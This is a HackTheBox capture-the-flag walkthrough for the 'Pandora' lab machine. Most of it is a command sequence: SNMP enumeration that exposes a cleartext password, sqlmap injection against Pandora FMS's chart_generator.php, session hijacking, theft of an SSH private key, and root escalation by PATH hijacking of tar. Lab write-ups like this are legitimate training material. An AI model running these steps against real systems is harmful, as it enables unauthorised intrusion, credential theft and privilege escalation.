HackTheBox – Pandora Walkthrough – In English
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nmap -sV -sC 10.10.11.136
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nmap -sU -top-ports=20 panda.htb
┌──(root㉿kali)-[/home/kali/Downloads]
└─# snmpwalk -v 1 -c public panda.htb > snmpwalk-1.txt
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat snmpwalk-1.txt
We get
Username: daniel
Password: HotelBabylon23
┌──(root㉿kali)-[/home/kali/Downloads]
└─# ssh daniel@10.10.11.136
As you can see, while I was going through the information I found a cleartext username and password, so I used those to log into the machine via SSH.
The user flag is in another user’s directory, so I need to pivot into that user. The two primary targets I had were /var/www/html
and /var/www/pandora
. The html
side was visible to the public, but the pandora
was new. Inside the /etc/hosts
file we see weird assignment, so I decide to use this as a lead.
If we assume that this hostname will trigger the pandora directory, then we will need to set up a dynamic tunnel. You can do this with the following command: ssh -D 9090 daniel@panda.htb
Using this tunnel, we can set up a proxy to view the webpage.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# ssh -D 9090 daniel@panda.htb
http://localhost.localdomain/pandora_console/
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat /etc/proxychains4.conf
┌──(root㉿kali)-[/home/kali/Downloads]
└─# proxychains sqlmap –url=”http://localhost.localdomain/pandora_console/include/chart_generator.php?session_id=”” -D pandora –tables
┌──(root㉿kali)-[/home/kali/Downloads]
└─# proxychains sqlmap –url=”http://localhost.localdomain/pandora_console/include/chart_generator.php?session_id=”” -Ttpassword_history –dump
┌──(root㉿kali)-[/home/kali/Downloads]
└─# proxychains sqlmap –url=”http://localhost.localdomain/pandora_console/include/chart_generator.php?session_id=”” -Ttsessions_php –dump
http://localhost.localdomain/pandora_console/index.php?session_id=g4e01qdgk36mfdh90hvcc54umq
https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated/blob/master/sqlpwn.py
We login now as admin.
http://localhost.localdomain/pandora_console/images/
$ python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
matt@pandora:/home/matt$ cd .ssh
matt@pandora:/home/matt/.ssh$ cat id_rsa.pub > authorized_keys
matt@pandora:/home/matt/.ssh$ chmod 700 authorized_keys
matt@pandora:/home/matt/.ssh$ cat id_rsa
┌──(root㉿kali)-[/home/kali/Downloads]
└─# ssh matt@10.10.11.136 -i id_rsa
matt@pandora:~$ cd /home/matt/
matt@pandora:~$ echo “/bin/bash” > tar
matt@pandora:~$ chmod +x tar
matt@pandora:~$ export PATH=/home/matt:$PATH
matt@pandora:~$ /usr/bin/pandora_backup
root@pandora:~# cat /root/root.txt